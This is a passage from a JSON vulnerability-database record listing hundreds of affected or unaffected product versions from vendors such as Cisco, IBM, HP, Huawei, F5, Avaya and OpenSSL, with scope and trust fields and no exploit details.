"version": "433012.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "8.4-release-p12", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netcool/system service monitor fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.014" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0" }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "9.2-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip edge clients for android", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.0.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.92743" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.59" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7080" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.0.5" }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-1000n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project metasploit framework", "scope": "eq", "trust": 0.3, "vendor": "metasploit", "version": "4.1.0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "security enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v19.7" }, { "model": "solaris", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.1.20.5.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "10.0-release-p5", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-500n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "prime performance manager for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v310.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "fastsetup", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "documentum content server sp2", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77109.7" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.2" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "project metasploit framework", "scope": "eq", "trust": 0.3, "vendor": "metasploit", "version": "4.9.1" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10648" }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.9" }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "puredata system for operational analytics a1791", "scope": 